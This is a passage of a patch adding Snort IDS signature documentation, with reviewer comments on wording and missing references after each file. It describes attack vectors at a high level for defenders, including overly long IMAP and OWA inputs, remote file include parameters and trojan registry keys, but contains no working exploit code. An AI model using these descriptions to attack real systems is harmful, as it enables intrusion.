+server to attempt this exploit.
+
+--
+Detailed Information:
+When an LSUB command with an overly long argument is sent to a
+vulnerable IMAP server, a buffer overflow condition may occur. This can
+allow an attacker to execute arbitrary code from the command shell. Note
+that this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LSUB command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
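Review bot: Detailed Information inverts cause and effect: "execute arbitrary code from the command shell" should say that the overflow lets the attacker execute arbitrary code, which can in turn yield a shell (Attack Scenarios has the order right). The document states three times that a valid IMAP account is required but never says with whose privileges the injected code runs; since the overflow is post-authentication, state whether that is the authenticated user's or the daemon's privilege level, as it changes the Impact considerably. Additional References is empty; cite the advisory for the two imapd versions listed. Corrective Action should name a fixed version rather than "the patch for your current version of imapd appropriate to your operating system".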
--- /dev/null
+++ b/doc/signatures/100000631.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000631
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "review_validate_edit.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"review_validate_edit.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
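Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section are credential-validation boilerplate (an attacker supplying "his/her own credentials" to an "authentication mechanism") that does not describe a remote file include through "admin_template_path"; the scenario should be that the attacker requests review_validate_edit.php with admin_template_path set to a URL they control, so the server includes and executes that remote PHP file. Also fix "ona web server", replace the redundant "may indicate that an exploitation attempt has been attempted" with "may indicate an exploitation attempt", and replace "All systems running CGI applications using Indexu" with the Indexu versions actually affected.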
--- /dev/null
+++ b/doc/signatures/1983.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1983
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
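Review bot: the "See also" line in Detailed Information lists sid 1983, which is this rule itself; the cross-reference should be to 195, 1980, 1981 and 1982 only. This file also lacks the Affected Systems section the other signature docs use; the Windows 95/98/ME list belongs under that heading rather than inside Detailed Information. Minor: "Deepthroat sever" should be "server", and the Ease of Attack section describes the infection rather than stating how easy the attack is.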
--- /dev/null
+++ b/doc/signatures/461.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+461
+
+--
+
+Summary:
+This event is generated when an ICMP Type 2 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 2 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 2 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 2 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
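Review bot: the Impact section ("not currently used by any known devices") restates the Detailed Information instead of giving an impact; say that the traffic is deliberately crafted, carries no direct impact by itself, and warrants investigation of the source. Attack Scenarios "None known" sits oddly beside Ease of Attack "numerous tools and scripts can generate this type of ICMP datagram"; the scenario is an attacker generating crafted ICMP with one of those tools, so say so. The Rule section is empty and the Corrective Action line is missing its full stop.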
--- /dev/null
+++ b/doc/signatures/690.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+690
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
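Review bot: the Affected Systems and Additional References sections are empty and the Summary names only "a known vulnerability in Microsoft SQL", so a reader cannot tell which product versions or which vulnerability sid 690 covers; list the SQL Server versions concerned and cite the vendor advisory. Corrective Action's "disallow administrative access from sources external to the protected network" is good advice but should name the listener port the rule watches so the filter can actually be written.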
--- /dev/null
+++ b/doc/signatures/3356.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3356
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
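Review bot: the Attack Scenarios section ("a request for a file with an overly long filename via a network share") contradicts the Detailed Information, which says the trigger is a malformed DCOM request sent over RPC; the scenario should describe an attacker sending a crafted RPC request to the DCOM interface on one of the ports listed under Corrective Action (135, 139, 445). Fix "Expoit code exists" to "Exploit code exists", and since the text calls this a "known vulnerability", cite the vendor bulletin in the empty Additional References section.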
--- /dev/null
+++ b/doc/signatures/1465.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1465
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
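Review bot: nothing in this file says which CGI script or request pattern sid 1465 matches, and "All systems running CGI applications" under Affected Systems is too broad to act on; name the script and the product it ships with so an analyst can check whether it is present. Detailed Information also mixes two unrelated weaknesses (credential validation and unchecked input); keep whichever one the rule actually detects. Typo: "ona web server".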
--- /dev/null
+++ b/doc/signatures/2298.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2298
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
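Review bot: the Attack Scenarios section is the generic "authentication mechanism / supply his/her own credentials" text and does not match the Detailed Information, which describes unchecked user input leading to PHP code execution, file inclusion and file retrieval; rewrite the scenario around a crafted request parameter to the vulnerable Advanced Poll 2.0.2 script. Additional References is empty for a vulnerability the text calls "known", so the advisory should be cited.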
--- /dev/null
+++ b/doc/signatures/1429.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1429
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
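Review bot: the Summary is a sentence fragment ("This event is generated when network traffic indicating the use of an application or service that may violate a corporate security policy." has no main verb) and never says which application or service the rule detects; add "is detected" and name the application. For a policy rule, "False Positives: None known" is not credible, because sanctioned use of the same application produces identical traffic; the section should say the event must be judged against local policy. Corrective Action is missing its terminating full stop.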
--- /dev/null
+++ b/doc/signatures/1724.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1724
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
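Review bot: apart from the Sid this file is a verbatim copy of 1465.txt, including the "ona web server" typo, so it inherits the same gap: nothing identifies the CGI script or product that sid 1724 matches, and the Affected Systems entry is unactionable. Each rule's doc should state its own target; a copied template tells the analyst nothing that distinguishes the two events.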
--- /dev/null
+++ b/doc/signatures/1089.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1089
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
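Review bot: Affected Systems is empty and the Attack Scenarios talk only about "the ftp root directory" although Detailed Information says traversal targets web servers and web applications too; say which service and which path pattern sid 1089 actually matches. Beyond patching, a rule about path checking should also suggest confining the daemon to its document root (chroot or the server's equivalent setting) as a mitigation that does not depend on the vendor. Additional References is empty.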
--- /dev/null
+++ b/doc/signatures/1283.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1283
+
+--
+Summary:
+This event is generated when an attempt is made to cause a denial of service of WWW Publishing Service and IIS Administration software.
+
+--
+Impact:
+Denial of service.  This attack may cause a vulnerable server to stop.
+
+--
+Detailed Information:
+Outlook Web Access (OWA) is an optional feature of Microsoft Exchange Server that allows a user to access mail through a web interface supported by Internet Information Services (IIS).  A denial of service of the support software WWW Publishing service and IIS Administration can occur when a user enters a long string of '%' characters in the Log On field in OWA and enters these characcters in the username and password field received in the NT challenge dialog.
+
+--
+Affected Systems:
+Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4
+
+--
+Attack Scenarios:
+An attacker can enter a long string of '%' characters in OWA Log On and challenge fields to cause a denial of service against a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the most current version of Microsoft Exchange Server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/3223
+
+--
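Review bot: the Summary names "WWW Publishing Service and IIS Administration software" but not Outlook Web Access, which Detailed Information identifies as the actual entry point; lead with OWA so the analyst knows which hosts to check. Typo "characcters" in Detailed Information. Corrective Action "Upgrade to the most current version" is vaguer than the rest of the file; since Affected Systems lists Exchange 5.5 through SP4, state whether a hotfix exists for 5.5 or whether the fix requires a later product version.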
--- /dev/null
+++ b/doc/signatures/349.txt
@@ -0,0 +1,63 @@
+SID:
+349
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+NcFTP Software NcFTPD 2.3.5
+Washington University wu-ftpd 2.4.2 (beta 18) VR10 
+RedHat wu-ftpd 2.4.2 b18-2 
+Washington University wu-ftpd 2.4.2 academ[BETA-18] 
+Probably others as well, susspect anything under Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
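Review bot: the section order (SID before Rule, "References" instead of "Additional References") differs from every other file in this patch and should be normalised. Detailed Information has "very log directory names" for "very long", plus "insufficent", "wich" and "susspect". Affected Systems lists NcFTPD 2.3.5 although the text only describes the wu-ftpd bug; either explain why NcFTPD is listed or drop it. Attack Scenarios says "a local attacker", but creating directories on an ftp server needs only an ftp account with write access, not local access, so say "an attacker with write access to the ftp server".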
--- /dev/null
+++ b/doc/signatures/571.txt
@@ -0,0 +1,66 @@
+SID:
+571
+--
+
+Rule:
+--
+
+Summary:
+This event indicates an attempt to exploit the tool talk RPC database 
+service
+--
+
+Impact:
+Possible unauthorized administrative access to the server or application
+or a denial of service to the affected application running on a Solaris 
+system
+--
+
+Detailed Information:
+ToolTalk RPC database service (rpc.ttdbserverd) does not perform 
+adequate input validation or provide a format string specifier argument 
+when writing to syslog. This means a specifically crafted RPC request to
+the ToolTalk RPC database service overwriting specific locations in 
+memory and therefore allowing execution of code with the same permission
+level as the user running ttdbserverd, usually root.
+--
+
+Affected Systems:
+	Solaris 1.1 - 2.6
+Possibly other vendors, if you are running Tool Talk (rpc.ttdbserverd) check with your vendor.
+--
+
+Attack Scenarios:
+An attacker will send a specially crafted RPC call to the 
+rpc.ttdbserverd daemon running on an affected system. A sucessful 
+attack will then run code on the server with the access level of the 
+root user.
+--
+
+Ease of Attack:
+Simple, Exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Updates packages and patches are available from vendors, install them or
+disable the service if not needed.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
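Review bot: the Detailed Information sentence beginning "This means a specifically crafted RPC request ..." has no main verb; change "overwriting ... and therefore allowing" to "overwrites ... and therefore allows". It also describes two different bugs (missing input validation and a missing format string argument when writing to syslog) without saying which one sid 571 detects; name the one the rule matches. Typos: "tool talk" in the Summary, "sucessful" in Attack Scenarios, "Updates packages" in Corrective Action. References is empty.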
--- /dev/null
+++ b/doc/signatures/100000381.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000381
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_ug_auth.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_ug_auth.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
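Review bot: same problem as the Indexu file earlier in this patch: the credential-validation paragraph in Detailed Information and the "authentication mechanism" Attack Scenario do not describe a remote file include via "phpbb_root_path". The parameter name suggests the script belongs to the phpBB forum component bundled with phpNuke, so Affected Systems should name the phpNuke (or bundled phpBB) versions concerned rather than "All systems running CGI applications using phpNuke". Fix "ona web server" and "an exploitation attempt has been attempted".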
--- /dev/null
+++ b/doc/signatures/1294.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid:
+1294
+
+--
+Summary: 
+This event is generated when traffic indicating Nimda worm activity is
+detected.
+
+--
+Impact:
+Possible infection by the Nimda virus.
+
+--
+Detailed Information:
+Nimda spreads by file infection, mass emailer, file share, or IIS unicode exploit 
+to attack unpatched systems.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows 2000
+
+--
+Attack Scenarios:
+An unpatched server is connected to the internet and is infected or
+an infected email is opened. Once infected the worm spreads itself.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check the suspect host for signs of infection. Apply patches 
+or upgrade the operating system
+
+--
+Contributors:
+Snort documentation contributed by Timothy Vienneau
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/virus/nimda.asp
+
+F-Secure:
+http://www.f-secure.com/v-descs/nimda.shtml
+
+--
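Review bot: Impact says "Nimda virus" while the Summary and Detailed Information call it a worm; use one term. The file does not say which of the listed vectors (file infection, mass mail, file share, IIS unicode exploit) sid 1294 detects, and since the IIS vector depends on the IIS version rather than only the Windows version, Affected Systems should state which IIS versions are vulnerable. Corrective Action lacks a full stop, and "Apply patches or upgrade the operating system" should point at the IIS patches that close the unicode vector.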
--- /dev/null
+++ b/doc/signatures/569.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+569
+
+--
+Summary:
+The snmpXdmi daemon is used on Sun Solaris systems to map Simple Network
+Management Protocol (SNMP) management requests to and from the Desktop 
+Management Interface (DMI).
+
+This daemon contains a boundary condition error that could result in a 
+buffer overflow that will present the attacker with super user access to
+the target host.
+
+--
+Impact:
+Complete control of the target machine.
+
+--
+Detailed Information:
+The snmpXdmi daemon is installed and enabled by default on the affected 
+systems below.
+
+DMI is used to manage components on client machines across a network. It
+can be used in conjunction with SNMP via a daemon such as snmpXdmi.
+
+A number of exploits for this vulnerability exist and are in use. The result of a sucessful attack is a complete root compromise of the victim host.
+
+Compromised systems are reported to display a number of commonalities such as:
+
+	A core file for snmpXdmi on /
+	Two instances of inetd running
+	Telnet and SSH backdoors running on high ports
+	An instance of an IRC proxy
+	System binaries replaced by rootkit versions
+	Network sniffers installed
+	Log files changed
+
+The system binaries 'ps' and 'netstat' cannot be trusted to show all 
+running processes since they may have been replaced by rootkit versions 
+specially modified so as to hide evidence of the compromise.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, 8.0 for SPARC and Intel architectures
+
+--
+Attack Scenarios:
+The attacker must send specially crafted packets to the snmpXdmi daemon 
+or use one of the widely available exploits.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the snmpXdmi service.
+
+Apply the appropriate patches for each affected system.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2417
+
+CERT:
+http://www.cert.org/advisories/CA-2001-05.html
+http://www.kb.cert.org/vuls/id/648304
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+--
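Review bot: the Summary describes the daemon and the bug but, unlike the other files, never says what traffic generates the event; add a "This event is generated when ..." sentence naming the crafted request to snmpXdmi that the rule matches. Typo "sucessful" in Detailed Information. Since the text itself says ps and netstat may be rootkit replacements, Corrective Action should add that a suspected host must be examined from known-good media or offline, not with its own binaries. The references section here is complete and is the model the other files in this patch should follow.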
--- /dev/null
+++ b/doc/signatures/549.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+549
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
